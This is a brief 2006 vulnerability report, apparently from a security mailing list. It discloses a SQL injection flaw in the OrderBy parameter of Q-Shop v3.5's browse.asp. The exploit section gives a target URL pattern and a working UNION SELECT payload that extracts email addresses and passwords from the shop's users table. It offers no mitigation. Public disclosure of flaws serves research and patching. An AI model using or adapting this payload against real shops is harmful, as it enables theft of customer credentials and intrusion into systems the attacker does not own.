Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability

Mon, 18 Sep 2006 10:16:56 -0700 

Vulnerability Report

*******************************************************************************

# Title  :  Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability


# Author :   ajann


# Script Page : http://quadcomm.com


# Exploit;


*******************************************************************************


###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]


Example: 
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users


# ajann,Turkey!Muslim

# ...

Reply via email to